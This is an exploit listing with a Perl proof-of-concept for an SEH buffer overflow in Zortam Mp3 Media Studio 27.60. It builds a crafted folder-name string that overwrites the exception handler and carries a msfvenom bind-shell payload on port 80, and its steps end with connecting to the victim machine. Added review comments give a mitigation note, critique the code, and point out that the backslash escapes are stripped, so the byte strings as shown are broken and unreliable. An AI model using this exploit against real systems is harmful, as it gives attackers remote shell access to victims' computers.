# Exploit Title: Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH)
# Date: November 19, 2020
# Exploit Author: Vincent Wolterman
# Vendor Homepage: https://www.zortam.com/index.html
# Software Link: https://www.zortam.com/download.html
# Version: 27.60
# Tested on: Windows 7 Professional SP 1 Build 7601; Windows 10 Professional Build 19041

# Steps to reproduce crash:
# 1) Run provided Perl code Zortam_MP3_Studio_poc.pl
# 2) Open Zortam_Crash.txt output file
# 3) Copy contents of text file to clipboard
# 4) Open Zortam Mp3 Studio
# 5) From the Menu bar -> File -> New Library
# 6) Click ‘OK’ when prompted ‘Do you want to create a new Mp3 library?’
# 7) Paste the contents of Zortam_Crash.txt into the ‘Select Folder’ field
# 8) Click 'OK'
# 9) Connect to victim machine on port 80

#!/usr/bin/perl

# Proof-of-concept file generator.  The script concatenates four pieces
# (filler string, nSEH/SEH record overwrite, NOP sled, msfvenom-generated
# payload) and writes the result to Zortam_Crash.txt; the reproduction
# steps above then paste that text into the application's "Select Folder"
# field.  The script itself never contacts the application -- its only
# side effects are the output file and two status lines on STDOUT.
#
# NOTE(review): every byte string below is written as "x90", "xeb", ...
# with no backslash.  As listed, Perl therefore emits the literal
# characters x, 9, 0 rather than a 0x90 byte, so the buffer lengths in the
# trailing comments do not hold for this text as shown.  The escape
# backslashes look like they were stripped when the listing was extracted;
# verify against the original submission before relying on any offset.
#
# NOTE(review): no `use strict; use warnings;`, package globals throughout,
# and a bareword, 2-arg, unchecked open()/close() in the file-writing
# section at the bottom (see the comments there).

$baddata = "Metal's_Greatest_Hits"; # you can put whatever you need to here to convince victim (will be seen during crash)
$baddata .= "x90" x (268-length($baddata)); # exact overwrite at 272: pads the filler to 268 bytes so the 4-byte nSEH below lands at offset 268 and the SEH handler at 272

$nseh = "xebx0bx90x90"; # nseh overwrite JMP short 11 bytes into NOP sled

# 0x10015962 : pop ecx # pop esi # ret | ascii {PAGE_EXECUTE_READ} [WNASPI32.DLL] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.1.50
# (C:\Program Files\Zortam Mp3 Media Studio\WNASPI32.DLL)
# Mitigation note: the technique depends on this module being loaded at a
# fixed address without SafeSEH (as the author's mini-ish output above
# reports).  Shipping the DLL linked with /SAFESEH and /DYNAMICBASE -- or
# simply not shipping a module with those protections disabled -- removes
# the gadget the overwrite relies on, independently of the input-length
# bug in the "Select Folder" handling.

$seh = "x62x59x01x10"; # seh overwrite
$nop = "x90" x 12; # NOP sled

# msfvenom -p windows/shell_bind_tcp LPORT=80 -b "x00x0ax0d" -f perl -v payload EXITFUNC=seh
# Payload size: 355 bytes

$payload =
"xd9xcfxbfxadx91xa4xe3xd9x74x24xf4x5ax29xc9" .
"xb1x53x83xc2x04x31x7ax13x03xd7x82x46x16xdb" .
"x4dx04xd9x23x8ex69x53xc6xbfxa9x07x83x90x19" .
"x43xc1x1cxd1x01xf1x97x97x8dxf6x10x1dxe8x39" .
"xa0x0exc8x58x22x4dx1dxbax1bx9ex50xbbx5cxc3" .
"x99xe9x35x8fx0cx1dx31xc5x8cx96x09xcbx94x4b" .
"xd9xeaxb5xdax51xb5x15xddxb6xcdx1fxc5xdbxe8" .
"xd6x7ex2fx86xe8x56x61x67x46x97x4dx9ax96xd0" .
"x6ax45xedx28x89xf8xf6xefxf3x26x72xebx54xac" .
"x24xd7x65x61xb2x9cx6axcexb0xfax6exd1x15x71" .
"x8ax5ax98x55x1ax18xbfx71x46xfaxdex20x22xad" .
"xdfx32x8dx12x7ax39x20x46xf7x60x2dxabx3ax9a" .
"xadxa3x4dxe9x9fx6cxe6x65xacxe5x20x72xd3xdf" .
"x95xecx2axe0xe5x25xe9xb4xb5x5dxd8xb4x5dx9d" .
"xe5x60xcbx95x40xdbxeex58x32x8bxaexf2xdbxc1" .
"x20x2dxfbxe9xeax46x94x17x15x68x35x91xf3x02" .
"xa5xf7xacxbax07x2cx65x5dx77x06xddxc9x30x40" .
"xdaxf6xc0x46x4cx60x4bx85x48x91x4cx80xf8xc6" .
"xdbx5ex69xa5x7ax5exa0x5dx1excdx2fx9dx69xee" .
"xe7xcax3exc0xf1x9exd2x7bxa8xbcx2ex1dx93x04" .
"xf5xdex1ax85x78x5ax39x95x44x63x05xc1x18x32" .
"xd3xbfxdexecx95x69x89x43x7cxfdx4cxa8xbfx7b" .
"x51xe5x49x63xe0x50x0cx9cxcdx34x98xe5x33xa5" .
"x67x3cxf0xdbx96x8cxedx4cx01x65x4cx11xb2x50" .
"x93x2cx31x50x6cxcbx29x11x69x97xedxcax03x88" .
"x9bxecxb0xa9x89";


# Write the pieces out in the order they must appear in the pasted text.
# $file is assigned but the open() below hard-codes the same name again;
# the two should be kept in sync (or open() should use $file) so that the
# status line at the end reports the file that was actually written.
# Style: bareword FILE handle, 2-arg open and no `or die` -- a failed
# open (e.g. read-only working directory) silently produces an empty or
# missing file and the script still reports success.  Preferred form:
#   open my $fh, '>', $file or die "open $file: $!";  ...  close $fh or die $!;
# For defenders, this output file (name and content) is the only host
# artifact the generator leaves behind.
$file = "Zortam_Crash.txt";
open (FILE, '>Zortam_Crash.txt');
print FILE $baddata;
print FILE $nseh;
print FILE $seh;
print FILE $nop;
print FILE $payload;
close (FILE);

# Status output.  The trailing newlines appear to have been lost along
# with the other backslash escapes in this listing ("] " / " " rather
# than "]\n" / "\n"), so as shown both lines print without a line break.
# Note that "Buffer size" reports only length($baddata), not the total
# length of everything written to the file.
print "Exploit file created [" . $file . "] ";
print "Buffer size: " . length($baddata) . " ";